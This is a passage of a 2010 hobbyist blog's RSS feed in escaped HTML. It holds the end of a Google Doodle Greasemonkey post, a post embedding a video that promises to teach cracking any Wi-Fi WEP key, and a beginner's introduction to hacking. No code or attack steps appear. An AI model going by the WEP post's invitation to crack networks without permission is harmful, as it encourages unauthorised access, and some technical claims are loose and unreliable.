Favourite Google Doodle from Google Doodle Gallery&quot; width=&quot;460&quot; /&gt;&lt;br /&gt;
Once you have made a choice, simply click on the&amp;nbsp;”Make This My  Favorite Doodle” button under your favourite Google Doodle to make the  Google Doodle permanent on the Google homepage.&lt;br /&gt;
So, will you still see new logos on holidays? Don’t worry, you  wouldn’t miss any single new doodle on Google homepage. Whenever a new  Google Doodle is shown, your favourite doodle will be replaced by the  new doodle for that particular day. After the holiday, your favourite  doodle will be displayed again.&lt;br /&gt;
However, if you want, you can disable new Google Doodle from showing.  Simply&amp;nbsp;select “Favorite Doodle -&amp;gt; Always show my favorite doodle,  even on holidays” option from the Greasemonkey “User Script Commands”  menu.&lt;br /&gt;
&lt;img alt=&quot;Disable New Google Doodle from Showing&quot; class=&quot;alignnone size-full wp-image-1968&quot; height=&quot;146&quot; src=&quot;http://mytechquest.com/blog/wp-content/uploads/2009/10/Disable-New-Google-Doodle-From-Showing.jpg&quot; title=&quot;Disable New 
Google Doodle from Showing&quot; width=&quot;460&quot; /&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2010/12/change-google-doodle-as-your-name-with.html</link><author>noreply@blogger.com (Amit Tyagi)</author><thr:total>44</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-6611547572226022104</guid><pubDate>Wed, 08 Dec 2010 04:38:00 +0000</pubDate><atom:updated>2010-12-08T00:03:48.404-08:00</atom:updated><title>How to Hack Wireless (Wi-Fi) -</title><description>&lt;object height=&quot;385&quot; width=&quot;480&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/jETwvEDaJeQ?fs=1&amp;amp;hl=en_US&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/jETwvEDaJeQ?fs=1&amp;amp;hl=en_US&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;480&quot; height=&quot;385&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can learn here that how to hack a wi-fi password (WEP Key) from your laptop? All you want to do is what this video is gonna teach you.You watch it and crack any wireless WEP key.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Amit Tyagi</description><link>http://amit-spot.blogspot.com/2010/12/how-to-hack-wireless-wi-fi.html</link><author>noreply@blogger.com (Amit Tyagi)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-6792075563145029535</guid><pubDate>Sat, 20 Nov 2010 14:48:00 +0000</pubDate><atom:updated>2011-02-24T03:54:32.057-08:00</atom:updated><title>For Beginners- Introduction to Hacking</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fFUpEw8Q19BK1n33Y9flASSO9DBgc-dHJc1ka07BGEwxndwOUAc20MMZ0zM5DcSHYWC8V9wBkPMJ0IjDKphsUjs0GA5YZ02TNRZ59VprNtY7YxKySfjkcJJKjDaiAt88vPKWeLxIBWg/s1600/Hacker_d70focus_1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;213&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fFUpEw8Q19BK1n33Y9flASSO9DBgc-dHJc1ka07BGEwxndwOUAc20MMZ0zM5DcSHYWC8V9wBkPMJ0IjDKphsUjs0GA5YZ02TNRZ59VprNtY7YxKySfjkcJJKjDaiAt88vPKWeLxIBWg/s320/Hacker_d70focus_1.jpg&quot; style=&quot;cursor: move;&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt; &lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-style: normal;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; The metamorphism into a hacker&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Welcome to &lt;/span&gt;&lt;i&gt;&lt;u&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Amit-Spot&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, a non-profit organization intended to teach you about computer &lt;/span&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;security/hacking&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. Look around the site and you will find Missions to be completed and a well-maintained forum. Take time to read the articles available here and increase your repertoire of knowledge.Feel free to ask, and asking as a script kiddie is a skill in itself which I will cover later.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;font-style: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;What is taught here&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-style: normal;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;The main focus of Amit-Spot ,is web hacking and exploitation. For this knowledge of HTML is necessary as it is the bread and butter of things to come. Take time to learn it here: &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.w3schools.com/&quot;&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;http://www.w3schools.com&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Have fun doing the challenges, have a determination to learn and you will become a great hacker in no time.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;                           &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-style: normal;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;:: Types Of Hacker ::&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;There are three Categories of hackers:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;-&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;1.0) WHITE HAT HACKERS:-&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;This type of hackers are basically the penetration testers for vulnerabilities in the security of the systems.They work for the companies to secure their confidential informations.They are often called ETHICAL HACKERS.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;2.0) BLACK HAT HACKERS:- &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;This type hackers are the guys who exploits the systems for their Malicious Purposes like stealing user name and password of any organization, stealing money from banks websites, stealing confidential data like software and important documents etc.They are often called CRACKERS or SCRIPT KIDDIES.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;3.0) GRAY HAT HACKERS:- &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;These are basically intermediate level hackers for above two categories. Means they do both type of hacking. If we talk about more precisely then they are basically ethical hackers they generally do Black hacking under the written permission of authority of concerned department.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;                    &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-style: normal;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;What about hacking in the movies&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Movies such as &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Die Hard 4.0 &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;show hacking as what most teenagers and villains do. This is entirely false as preteens as young as 12 learn and the majority of hackers are “&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;White Hat&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;”. This is a stereotype which many civilians believe hackers are.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Next is the “&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;hacking part&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;” in the movies. You hear them mention about &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Nmap &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;and there is a certain program opened with black background and white text only with strange code on it. Now this is “&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Server Rooting&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;,” a very advanced type of hacking. This is hacking into the server and exploitation of the operating system, which takes years of hacking to even get to the “&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;newbie&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;” part of it.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;font-style: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;How about the hacking programs online? Do they make me a hacker?&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Most certainly not. There programs are made by hackers, obviously &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;black hat&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, to infiltrate into the script kiddie community and wreck havoc. What you don’t know is that there may be a line of code in there which makes you contribute to a huge &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;DOS attack&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;A hacker can be defined as this:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;a href=&quot;http://www.catb.org/~esr/faqs/hacker-howto.html#attitude&quot;&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;http://www.catb.org/~esr/faqs/hacker-howto.html#attitude&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;A hacker hacks by exploiting code and hacks manually, not using the program of others. If he needs a program he shall program it himself.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;font-style: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;What programming language should I learn? Many people say that I shouldn’t start on BASIC but it’s so simple!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;I am a victim of the bad syntax of &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;BASIC&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. Once you learn BASIC it is very hard to break the bad habit of its syntax. Especially a wide gap as switching from BASIC to C++. However this does not mean it’s a bad language. It still is a programming language but once you master BASIC you should stick to BASIC.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;A better start would be &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Python&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Perl &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;or &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Ruby&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. These are also high-level programming languages such as BASIC but their syntax is much better. For seconds you should try C/C++. These are quite hard to learn for a beginner so you should master a simpler programming language first.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;font-style: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Why do I always get flamed on the forums when I ask them to hack a website for me? You told me that I should ask!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;goog_710153832&quot;&gt;&lt;/a&gt;&lt;a href=&quot;&quot; name=&quot;goog_710153831&quot;&gt;&lt;/a&gt; &lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;font-style: normal; font-weight: normal; margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt; &lt;span style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;You were obviously asking wrongly. First here’s an introduction to the most-used forum rule:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm; orphans: 2; widows: 2;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
